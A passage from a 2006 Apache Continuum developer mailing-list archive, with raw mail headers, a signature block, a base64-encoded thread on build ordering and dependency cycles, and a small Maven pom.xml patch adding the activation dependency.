bmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3Vp bmcgQ0EwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f 6f+jHuy9zfVb8hp2vX8MOmHyv1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/Ef kTYkKhPPK9Xzgnc9A74r/rsYPge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7 AgMBAAGjgZQwgZEwEgYDVR0TAQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRw Oi8vY3JsLnRoYXd0ZS5jb20vVGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8E BAMCAQYwKQYDVR0RBCIwIKQeMBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqG SIb3DQEBBQUAA4GBAEiM0VCD6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQc UCCTcDz9reFhYsPZOhl+hLGZGwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bG CE6u9uo05RAaWzVNd+NWIXiC3CEZNd4ksdMdRv9dX2VPMYIDZDCCA2ACAQEwdjBiMQswCQYD VQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UE AxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0ECEHPerLP+yWp/U+jCFAQ0 kGwwCQYFKw4DAhoFAKCCAcMwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEHATAcBgkqhkiG9w0B CQUxDxcNMDYxMTA5MTUxNDI1WjAjBgkqhkiG9w0BCQQxFgQUvXZIMyEI5gl8HfNnuh/87a+S pvAwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0DAgICAIAwDQYIKoZI hvcNAwICAUAwBwYFKw4DAgcwDQYIKoZIhvcNAwICASgwgYUGCSsGAQQBgjcQBDF4MHYwYjEL MAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAq BgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcmVlbWFpbCBJc3N1aW5nIENBAhBz3qyz/slqf1Po whQENJBsMIGHBgsqhkiG9w0BCRACCzF4oHYwYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRo YXd0ZSBDb25zdWx0aW5nIChQdHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBG cmVlbWFpbCBJc3N1aW5nIENBAhBz3qyz/slqf1PowhQENJBsMA0GCSqGSIb3DQEBAQUABIIB AIGi4ipk0hxIi24ECMWOV8QawrcPAJxgi372oukE++RS8XKSiwRjJRdDA9uPxLH/wJ7wAMYA C73KnER1nsnrxYSLjeQtSoQ+Ikd3ZKWfJJy/aNxH6Et0p7VH5WOC9VfJ13MWsZnog8yuASGw ldeeWhhDVC5jC9YPXnRnOt0Ak92ystL4bX+iSMqpM+HG91JKVD7vU7bFILAsWrmr/Bw/ahm/ gjF/hOCOs4QvlmPDmrB3Utr7SWEj1gYZ7Dj+MYD2pmTlMmb8v6rhg2Q27yF1S3qMCWgS5Sdh 5+0yre9E+sUIe58bXun932dh+AJ8aTkLPSX9N1PrXcJ4AygUMQ/zMzQAAAAAAAA= --------------ms090502010206010308090400-- From [email protected] Thu Nov 09 15:20:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93507 invoked from network); 9 Nov 2006 15:20:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 15:20:45 -0000 Received: (qmail 21285 invoked by uid 500); 9 Nov 2006 15:20:56 -0000 Delivered-To: [email protected] Received: (qmail 21263 invoked by uid 500); 9 Nov 2006 15:20:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21252 invoked by uid 99); 9 Nov 2006 15:20:56 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:20:56 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:20:42 -0800 Received: by nf-out-0910.google.com with SMTP id l24so803278nfc for <[email protected]>; Thu, 09 Nov 2006 07:20:20 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=RGz6Pfct2vbYJUylbSoj7dPgKbI+o0frv1fi7fjx5C/Y60jFA0zkyTD1KEdq4ezcaqR71txlmcFhsShtAEoggZpZVUzsyU8oV16JldpFYQ4DBMbiIrKhDF5XTa77LiD/xOERHjkeo7U+FzzHLlsLHJTK9il3VrCSgQLCE7QPKFg= Received: by 161.129.204.104 with SMTP id p9mr142723bud.1163085620281; Thu, 09 Nov 2006 07:20:20 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 9 Nov 2006 07:20:19 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 9 Nov 2006 09:20:19 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: build scheduling issues In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: base64 Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org c29ycnksIG9uY2UgY2hhbmdlZCBob3c/ICBvbmNlIHRoZSBncm91cCBkZXBlbmRlbmNpZXMgYXJl IHNvcnRlZCBvdXQ/CgppZiB3ZSBhcmUgdGFraW5nIGFsbCBwcm9qZWN0cyBhY3Jvc3MgYWxsIGdy b3VwcyBhbmQgdHJ5aW5nIHRvIGdlbmVyYXRlCmEgY3ljbGUgZnJlZSBncmFwaCB0aGVuIGN5Y2xl cyBhcmUgcG90ZW50aWFsbHkgYSBwcm9ibGVtLgoKanVzdCBzbyB3ZSBhcmUgY2xlYXIgaW4gbXkg bWluZDoKCiogZ3JhYiBhbGwgcHJvamVjdHMgYWNyb3NzIGFsbCBncm91cHMKKiBhdHRlbXB0IHRv IHNvcnQKKiBpZiBzdWNjZXNzLCBidWlsZCBub3JtYWxseQoqIGlmIGZhaWx1cmUsIG5vdGlmeSBv ZiBjeWNsZSBhbmQgcHJvY2VlZCB0byBzZXF1ZW50aWFsbHkgcHJvY2Vzcwpncm91cHMsIHNvcnRp bmcgcHJvamVjdHMgaW4gdGhhdCBncm91cCBvbmx5IGFuZCBidWlsZGluZwoqIGlmIGN5Y2xlIGRl dGVjdGVkIGluIHRoYXQgZ3JvdXAgdGhlbiBidWlsZCBhbGwgcHJvamVjdHMgaW4gdGhhdApncm91 cCBpbiBhbnkgb2xkIG9yZGVyIHRoYXQgY29tZXMgb3V0IG9mIHRoZSBkYXRhYmFzZQoKVGhlIGRp ZmZlcmVuY2UgYmV0d2VlbiB0aGlzIGFuZCB3aGF0IHVzZWQgdG8gZXhpc3QgYmVmb3JlIG15IGdy b3VwCmNoYW5nZXMgaXMgdGhhdCBpdCB3aWxsIGF0dGVtcHQgdG8gb3JkZXIgaW5zaWRlIHRoZSBn cm91cCBhbmQgYnVpbGQgYXMKb3Bwb3NlZCB0byBiZWZvcmUgd2hlcmUgaXQgd291bGQganVzdCBm YWlsb3ZlciB0byBidWlsZGluZyBhbGwKcHJvamVjdHMgaW4gd2hhdGV2ZXIgb3JkZXIgY2FtZSBm cm9tIHRoZSBkYi4KCmlzIHRoYXQgd2hlcmUgd2UgYXJlIHdpdGggdGhpcz8KCmplc3NlCgoKCk9u IDExLzgvMDYsIEJyZXR0IFBvcnRlciA8YnJldHRAYXBhY2hlLm9yZz4gd3JvdGU6Cj4gVGhhdCdz IGEgY3ljbGUgYmV0d2VlbiB0aGUgZ3JvdXBzLCBub3QgdGhlIHByb2plY3RzLCBzbyBzaG91bGRu J3QgYmUKPiBhIHByb2JsZW0gb25jZSBjaGFuZ2VkLgo+Cj4gLSBCcmV0dAo+Cj4gT24gMDkvMTEv MjAwNiwgYXQgMTo1NyBBTSwgSmVzc2UgTWNDb25uZWxsIHdyb3RlOgo+Cj4gPiB0aGUgaXNzdWUg aXNuJ3QgY3ljbGVzIHdpdGhpbiBhIG5vcm1hbCBtMiBidWlsZCwgYnV0IHdoZW4geW91IHNob3Zl IDQKPiA+IG9yIDUgb2YgdGhlbSB0b2dldGhlciBpbnRvIG9uZSBjb250aW51dW0gaW5zdGFuY2Ug YW5kIHRoZW4gYXNrIHRoZW0KPiA+IGFsbCB0byBwbGF5IHRvZ2V0aGVyLgo+ID4KPiA+IEZvciBl eGFtcGxlIGlmIHlvdSBzaG92ZWQgY29udGludXVtLCBtYXZlbi1zaGFyZWQgYW5kIGFyY2hpdmEg YWxsIGludG8KPiA+IHRoZSBzYW1lIGNvbnRpbnV1bSBpbnN0YW5jZSBhbmQgdHJpZ2dlcmVkIGEg YnVpbGQgd2l0aCBhbGwgb2YgdGhlbSBpbgo+ID4gdGhlIHNhbWUgZGlyZWN0ZWQgZ3JhcGggdGhl biB3ZSBoYXZlIGhhZCBpbnN0YW5jZXMgb2YgY3ljbGVzIGluIHRoZQo+ID4gcGFzdCAobm90IHN1 cmUgYWJvdXQgcmlnaHQgbm93LCBtcGlyIGN5Y2xlIG1pZ2h0IGJlIHJlZmFjdG9yZWQgb3V0Cj4g PiB0aGFua3MgdG8gam9ha2ltKS4KPiA+Cj4gPiBlbW0gaGFkIGFub3RoZXIgZXhhbXBsZSBsYXN0 IG5pZ2h0IHdoZW4gd2Ugd2VyZSB0YWxraW5nIGFib3V0IGl0IGFzCj4gPiB3ZWxsLgo+ID4KPiA+ IGplc3NlCj4gPgo+ID4gT24gMTEvOC8wNiwgQnJldHQgUG9ydGVyIDxicmV0dEBhcGFjaGUub3Jn PiB3cm90ZToKPiA+PiBTb3JyeSwgYW0gSSBtaXNzaW5nIHNvbWV0aGluZz8gSG93IGRvIHdlIGVu ZCB1cCB3aXRoIGEgY3ljbGUgaW4KPiA+PiBDb250aW51dW0/IElzIHRoZXJlIGEgc3BlY2lmaWMg ZXhhbXBsZT8KPiA+Pgo+ID4+IEkga25vdyBpdCdzIHBvc3NpYmxlIC0gd2UgaGFkIHRvIGFsbG93 IGl0IGluIHRoZSByZXBvc2l0b3J5IChlZywKPiA+PiBkb200aiA8LT4gamF4ZW4pLCBidXQgaXQg aXMgY2VydGFpbmx5IHVuZGVzaXJhYmxlIGFuZCBob25lc3RseSBzaG91bGQKPiA+PiBiZSByYXJl LCBlc3BlY2lhbGx5IGluIG0yIGJ1aWx0IGFydGlmYWN0cy4gU2hvdWxkIGl0IHByb2R1Y2UgYSBi dWlsZAo+ID4+IHdhcm5pbmc/Cj4gPj4KPiA+PiBCYXNpY2FsbHksIHRoZSB0cmVhdG1lbnQgdGhl cmUgaXMgdG8ganVzdCBzdG9wIGZvbGxvd2luZyB0aGUgdHJlZQo+ID4+IHdoZW4geW91IGhpdCB0 aGUgY3ljbGUsIHJhdGhlciB0aGFuIGNoYW5naW5nIHRoZSB3YXkgdGhpbmdzIGFyZQo+ID4+IG9y ZGVyZWQuIFNvIGl0J3MgcmVhbGx5IGFyYml0cmFyeSB3aGljaCBtaWdodCBjb21lIGZpcnN0LCBi dXQgaXNuJ3QKPiA+PiByZWFsbHkgYSBjb25jZXJuIHRoZXJlLgo+ID4+Cj4gPj4gQW55d2F5LCBq dXN0IHdvbmRlcmluZy4KPiA+Pgo+ID4+IENoZWVycywKPiA+PiBCcmV0dAo+ID4+Cj4gPj4gT24g MDgvMTEvMjAwNiwgYXQgMTE6NDYgUE0sIEVtbWFudWVsIFZlbmlzc2Ugd3JvdGU6Cj4gPj4KPiA+ PiA+IFllcwo+ID4+ID4KPiA+PiA+IEplc3NlIE1jQ29ubmVsbCBhIMOpY3JpdCA6Cj4gPj4gPj4g d2Ugc2hvdWxkIGFkZCBhIHBhZ2UgdGhhdCBhbmFseXplcyBlYWNoIHNjaGVkdWxlIGZvciBjeWNs ZXMuLi50aGF0Cj4gPj4gPj4gd291bGQgYmUgYSBjb29sIGxpdHRsZSBmZWF0dXJlCj4gPj4gPj4g T24gMTEvOC8wNiwgRW1tYW51ZWwgVmVuaXNzZSA8ZW1tYW51ZWxAdmVuaXNzZS5uZXQ+IHdyb3Rl Ogo+ID4+ID4+PiBZZXMsIHdlIG5lZWQgYSBnbG9iYWwgb3JkZXJpbmcsIHNvIHByb2plY3RzIHdp bGwgYmUgYnVpbGQKPiA+PiA+Pj4gaW5kZXBlbmRlbnRseSBvZiBncm91cHMsIGJlY2F1c2UgaW4g c29tZQo+ID4+ID4+PiBjYXNlIGEgY3ljbGUgY2FuIGJlIGNyZWF0ZWQgYmV0d2VlbiBncm91cHMg KG5vdCBuZWNlc3NhcnkgYmV0d2Vlbgo+ID4+ID4+PiBwcm9qZWN0cykuCj4gPj4gPj4+Cj4gPj4g Pj4+IEluIGNhc2UgYSBjeWNsZSBpcyBkZXRlY3RlZCBiZXR3ZWVuIHByb2plY3RzLCBjb250aW51 dW0gY2FuJ3QKPiA+PiA+Pj4gZmluZCB0aGUgYnVpbGQgb3JkZXIuIEluIHRoaXMgY2FzZSwgSQo+ ID4+ID4+PiB0aGluayB3ZSBuZWVkIHRvIHNvcnQgYSBsaXR0bGUgcHJvamVjdCBzbyB3aWxsIHJl ZHVjZSBidWlsZAo+ID4+ID4+PiBlcnJvcnMuIFNvIGlmIHdlIGhhdmUgYSBjeWNsZSwgd2UgY2Fu Cj4gPj4gPj4+IHNvcnQgcHJvamVjdHMgaW4gYSBncm91cCBhbmQgYnVpbGQgdGhlbS4gSW4gbW9z dCBvZiBjYXNlIChtYXZlbgo+ID4+ID4+PiBwcm9qZWN0cyksIHdlIGRvbid0IGhhdmUgYSBjeWNs ZSBpbgo+ID4+ID4+PiBhIGdyb3VwLgo+ID4+ID4+Pgo+ID4+ID4+PiBFbW1hbnVlbAo+ID4+ID4+ Pgo+ID4+ID4+PiBCcmV0dCBQb3J0ZXIgYSDDqWNyaXQgOgo+ID4+ID4+PiA+IEkgdGhpbmsgeW91 IHdhbnQgZ2xvYmFsIG9yZGVyaW5nLiBHcm91cGluZyBzaG91bGQganVzdCBiZSBhCj4gPj4gPj4+ ID4gZGlzcGxheS9tYW5hZ2VtZW50IHRlY2huaXF1ZSwgbm90IGFueXRoaW5nIHRoYXQgY2hhbmdl cyBob3cKPiA+PiA+Pj4gcHJvamVjdHMgYXJlCj4gPj4gPj4+ID4gaGFuZGxlZC4KPiA+PiA+Pj4g Pgo+ID4+ID4+PiA+IEhvd2V2ZXIsIHRoaXMgbmVlZHMgdG8gYmUgcmV2aWV3ZWQgYXMgYSB3aG9s ZSAod2hpY2ggSSB0aGluawo+ID4+ID4+PiBFbW1hbnVlbCBpcwo+ID4+ID4+PiA+IGRvaW5nKSwg c3VjaCB0aGF0IGJ1aWxkcyBjYW4gYmUgdHJpZ2dlcmVkIHdoZW4gdGhlaXIKPiA+PiA+Pj4gZGVw ZW5kZW5jaWVzIGNoYW5nZQo+ID4+ID4+PiA+IHdoaWNoIHdpbGwgaGVscCB3aXRoIHRoZSBvcmRl cmluZyBhcyBpdCB3b24ndCBiZSBkZXBlbmRhbnQgb24KPiA+PiA+Pj4gdGhlbSBhbGwKPiA+PiA+ Pj4gPiBiZWluZyB0cmlnZ2VyZWQgYXQgdGhlIHNhbWUgdGltZT8KPiA+PiA+Pj4gPgo+ID4+ID4+ PiA+IC0gQnJldHQKPiA+PiA+Pj4gPgo+ID4+ID4+PiA+IE9uIDA4LzExLzIwMDYsIGF0IDk6NTEg QU0sIEplc3NlIE1jQ29ubmVsbCB3cm90ZToKPiA+PiA+Pj4gPgo+ID4+ID4+PiA+PiBJIHdhcyBy ZWFkaW5nIHRocm91Z2ggdGhlIERlZmF1bHRDb250aW51dW0uYnVpbGRQcm9qZWN0cwo+ID4+ID4+ PiAoIFNjaGVkdWxlIGlkCj4gPj4gPj4+ID4+ICkgbWV0aG9kIGFuZCBhZnRlciBkaXNjdXNzaW5n IHNvbWUgdGhpbmdzIHdpdGggRW1tYW51ZWwuLi5JCj4gPj4gPj4+IHRoaW5rIHdlCj4gPj4gPj4+ ID4+IGhhdmUgYSBwcm9ibGVtIGhlcmUuICBXaGVuIEkgd2VudCB0aHJvdWdoIGFuZCByZWZhY3Rv cmVkCj4gPj4gPj4+IHRoaW5ncyB0bwo+ID4+ID4+PiA+PiBzdXBwb3J0IGEgbW9yZSBQcm9qZWN0 IEdyb3VwIGNlbnRyaWMgc2V0dXAgd2l0aCBjb250aW51dW0gSQo+ID4+ID4+PiBjaGFuZ2VkCj4g Pj4gPj4+ID4+IHRoaXMgbWV0aG9kIGEgYml0Lgo+ID4+ID4+PiA+Pgo+ID4+ID4+PiA+PiBPcmln aW5hbGx5LCB0aGlzIG1ldGhvZCB3b3VsZCBnYXRoZXIgdXAgYWxsIHByb2plY3RzIHRoYXQKPiA+ PiA+Pj4gd291bGQgYmUKPiA+PiA+Pj4gPj4gdHJpZ2dlcmVkIGJ5IHRoYXQgc2NoZWR1bGUsIHJ1 biB0aGVtIGFsbCB0aHJvdWdoIHRoZSBwcm9qZWN0Cj4gPj4gPj4+IHNvcnRlcgo+ID4+ID4+PiA+ PiBhbmQgdGhlbiBidWlsZCBlYWNoIGluIHNlcXVlbmNlLgo+ID4+ID4+PiA+Pgo+ID4+ID4+PiA+ PiBXaGVuIEkgYWRkZWQgdGhlIHByb2plY3QgZ3JvdXBzIHRvIHRoaXMgbWl4LCBJIGNoYW5nZWQg dGhpbmdzCj4gPj4gPj4+IHRvIGJlIG9uCj4gPj4gPj4+ID4+IGEgcHJvamVjdCBncm91cCBiYXNp cywgc28gdGhhdCBvbiBhIHByb2plY3QgZ3JvdXAgYnkgcHJvamVjdAo+ID4+ID4+PiBncm91cAo+ ID4+ID4+PiA+PiBiYXNpcyBpdCB3b3VsZCBvcmRlciB0aGUgcHJvamVjdHMgYW5kIGJ1aWxkIHRo ZW0uICBBdCB0aGUKPiA+PiB0aW1lIEkKPiA+PiA+Pj4gPj4gdGhvdWdodCB0aGlzIHdhcyB0aGUg d2F5IHRvIGdvLi4uYnV0IG1heWJlIG5vdC4KPiA+PiA+Pj4gPj4KPiA+PiA+Pj4gPj4gMTc6MTQg PGV2ZW5pc3NlPiB3ZSBuZWVkIHRvIHRha2UgYWxsIHByb2plY3RzIGZyb20gYWxsIGdyb3VwcywK PiA+PiA+Pj4gc29ydCB0aGVtCj4gPj4gPj4+ID4+IDE3OjE1IDxldmVuaXNzZT4gaWYgd2UgZG9u J3QgaGF2ZSBhIGN5Y2xlLCBpdCdzIG9rIGFuZCB3ZQo+ID4+ID4+PiBidWlsZCBhbGwKPiA+PiA+ Pj4gPj4gMTc6MTUgPGV2ZW5pc3NlPiBpZiBpdCBpc24ndCBvaywgd2Ugc29ydCBwcm9qZWN0IGJ5 IGdyb3VwCj4gPj4gPj4+ID4+Cj4gPj4gPj4+ID4+IEZvciBleGFtcGxlLCBpZiB3ZSBsb2FkZWQg dXAgYSBQbGV4dXMgZ3JvdXAgYW5kIGEgTWF2ZW4KPiA+PiA+Pj4gZ3JvdXAuLi50aGUKPiA+PiA+ Pj4gPj4gd2F5IGl0IGN1cnJlbnRseSBpcyAod2l0aCBteSBjaGFuZ2UpIGl0IHdvdWxkIHByb2Nl c3MgYWxsCj4gPj4gPj4+IHRyaWdnZXJlZAo+ID4+ID4+PiA+PiBidWlsZHMgd2l0aGluIG9uZSBn cm91cCBhbmQgdGhlbiBwcm9jZXNzIGFsbCB0cmlnZ2VyZWQgYnVpbGRzCj4gPj4gPj4+IGluIHRo ZQo+ID4+ID4+PiA+PiBvdGhlciBncm91cC4gICBUaGlzIHdvdWxkIG5vdCB0YWtlIGludG8gYWNj b3VudCBwb3RlbnRpYWwKPiA+PiA+Pj4gZGVwZW5kZW5jaWVzCj4gPj4gPj4+ID4+IGJldHdlZW4g dGhlIHR3by4KPiA+PiA+Pj4gPj4KPiA+PiA+Pj4gPj4gRG9lcyBhbnlvbmUgaGF2ZSBhbnkgdGhv dWdodHMgb24gdGhpcz8gIEkgYW0gaW5jbGluZWQgdG8gZml4Cj4gPj4gPj4+IGl0IHVwIHNvCj4g Pj4gPj4+ID4+IGl0cyBsaWtlIGl0IHVzZWQgdG8gYmUgd2hlcmUgYWxsIHByb2plY3RzIGFjcm9z cyBhbGwgcHJvamVjdAo+ID4+ID4+PiBncm91cHMKPiA+PiA+Pj4gPj4gYXJlIHRocm93biBpbnRv IHRoZSBncmFwaC4uLi5JIGtlZXAgZmVlbGluZyBsaWtlIEkgYW0gbWlzc2luZwo+ID4+ID4+PiA+ PiBzb21ldGhpbmcgd3Jvbmcgd2l0aCB0aGlzLCBidXQgSSBjYW4ndCBwaW4gaXQgZG93bi4KPiA+ PiA+Pj4gPj4KPiA+PiA+Pj4gPj4gT25lIHRoaW5nIHRoYXQgcGVyaGFwcyBFbW1hbnVlbCBjb3Vs ZCBleHBsYWluIGEgYml0IG1vcmUgaXMKPiA+PiA+Pj4gdGhlIHRoaXJkCj4gPj4gPj4+ID4+IGNv bW1lbnQgdGhlcmUuICBJbiBvdXIgY29udmVyc2F0aW9uIG9uIHRoaXMgaGUgc2FpZCB0aGF0IGhl Cj4gPj4gPj4+IHRoaW5rcwo+ID4+ID4+PiA+PiB0aGF0IHRoZSBjeWNsZXMgYXJlIGNyb3BwaW5n IHVwIGFsbCB0aGUgdGltZSwgYW5kIGlmIHRoYXRzIHRoZQo+ID4+ID4+PiBjYXNlCj4gPj4gPj4+ ID4+IHRoZW4gd2UgYXJlIGJ1aWxkaW5nIGEgbG90IG9mIHVub3JkZXJlZCBidWlsZHMgd2hpY2gg d291bGQKPiA+PiA+Pj4gYWNjb3VudCBmb3IKPiA+PiA+Pj4gPj4gc29tZSBvZiB0aGUgc3RyYW5n ZSByZXBvcnRzIHdlIGhhdmUgYmVlbiBnZXR0aW5nLiAgQXJlIHlvdQo+ID4+ID4+PiBzYXlpbmcg dGhhdAo+ID4+ID4+PiA+PiBpZiB3ZSBkZXRlY3QgdGhlIGN5Y2xlIHdlIGRlZmF1bHQgYmFjayB0 byB0aGUgd2F5IEkgYW0gZG9pbmcKPiA+PiA+Pj4gaXQgbm93Pwo+ID4+ID4+PiA+PiBvcmRlciB3 aXRoaW4gdGhlIGdyb3Vwcy4uLgo+ID4+ID4+PiA+Pgo+ID4+ID4+PiA+PiBqZXNzZQo+ID4+ID4+ PiA+Pgo+ID4+ID4+PiA+Pgo+ID4+ID4+PiA+Pgo+ID4+ID4+PiA+Pgo+ID4+ID4+PiA+Pgo+ID4+ ID4+PiA+PiAtLWplc3NlIG1jY29ubmVsbAo+ID4+ID4+PiA+PiBqZXNzZS5tY2Nvbm5lbGxAZ21h aWwuY29tCj4gPj4gPj4+ID4KPiA+PiA+Pj4gPgo+ID4+ID4+PiA+Cj4gPj4gPj4+Cj4gPj4gPj4+ Cj4gPj4KPiA+Cj4gPgo+ID4gLS0KPiA+IGplc3NlIG1jY29ubmVsbAo+ID4gamVzc2UubWNjb25u ZWxsQGdtYWlsLmNvbQo+CgoKLS0gCmplc3NlIG1jY29ubmVsbApqZXNzZS5tY2Nvbm5lbGxAZ21h aWwuY29tCg== From [email protected] Thu Nov 09 15:22:14 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93779 invoked from network); 9 Nov 2006 15:22:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 15:22:13 -0000 Received: (qmail 22890 invoked by uid 500); 9 Nov 2006 15:22:24 -0000 Delivered-To: [email protected] Received: (qmail 22860 invoked by uid 500); 9 Nov 2006 15:22:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22849 invoked by uid 99); 9 Nov 2006 15:22:24 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:22:24 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nf-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:22:10 -0800 Received: by nf-out-0910.google.com with SMTP id l24so803684nfc for <[email protected]>; Thu, 09 Nov 2006 07:21:49 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=jvtaOqCjz14gh9AFE3Xv7cYNmBHNYLYnfvEl65WLIYYzkZw9DMjXuByTtSEtC7PddSuPfCGj6Ohf3m1iVPQVuCUKFQgNyRsgFQYXG0tq0LzztP5NxZaaPHmfD9lTQWp6ftJI9ixiRfY7WLMpP+hf8SHotlPBXqc4A4RHLnHk3d4= Received: by 161.129.204.104 with SMTP id i13mr143192bud.1163085708540; Thu, 09 Nov 2006 07:21:48 -0800 (PST) Received: by 161.129.204.104 with HTTP; Thu, 9 Nov 2006 07:21:48 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 9 Nov 2006 09:21:48 -0600 From: "Jesse McConnell" <[email protected]> To: [email protected] Subject: Re: [Patch] Missing dependency in continuum-trunk In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org hm, someone else seeing this Christian! your not the only one now! graham, what o/s and version of maven and jdk are you using? jesse On 11/9/06, Graham Leggett <[email protected]> wrote: > Hi all, > > There is a missing dependency on activation.jar within continuum-war. > The following patch fixes it. > > Index: continuum-webapp/pom.xml > =================================================================== > --- continuum-webapp/pom.xml (revision 472890) > +++ continuum-webapp/pom.xml (working copy) > @@ -200,6 +200,12 @@ > <version>1.0-alpha-2</version> > </dependency> > <dependency> > + <groupId>javax.activation</groupId> > + <artifactId>activation</artifactId> > + <version>1.1</version> > + <scope>provided</scope> > + </dependency> > + <dependency> > <groupId>javax.servlet</groupId> > <artifactId>servlet-api</artifactId> > <version>2.4</version> > > Regards, > Graham > -- > > > -- jesse mcconnell [email protected] From [email protected] Thu Nov 09 15:30:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95682 invoked from network); 9 Nov 2006 15:30:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Nov 2006 15:30:07 -0000 Received: (qmail 41598 invoked by uid 500); 9 Nov 2006 15:30:18 -0000 Delivered-To: [email protected] Received: (qmail 41576 invoked by uid 500); 9 Nov 2006 15:30:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <continuum-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41565 invoked by uid 99); 9 Nov 2006 15:30:18 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:30:18 -0800 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,RCVD_IN_SORBS_WEB,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO chandler.sharp.fm) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Nov 2006 07:30:04 -0800 Received: from chandler.sharp.fm (localhost [161.129.204.104]) by chandler.sharp.fm (Postfix) with ESMTP id 3486FE54F5 for <[email protected]>; Thu, 9 Nov 2006 09:29:43 -0600 (CST) Received: from [161.129.204.104] (mtngprs7.mtn.co.za [161.129.204.104]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by chandler.sharp.fm (Postfix) with ESMTP id B0604E4506 for <[email protected]>; Thu, 9 Nov 2006 09:29:27 -0600 (CST) Message-ID: <[email protected]> Date: Thu, 09 Nov 2006 17:28:56 +0200 From: Graham Leggett <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Macintosh/20061025) MIME-Version: 1.0 To: [email protected] Subject: 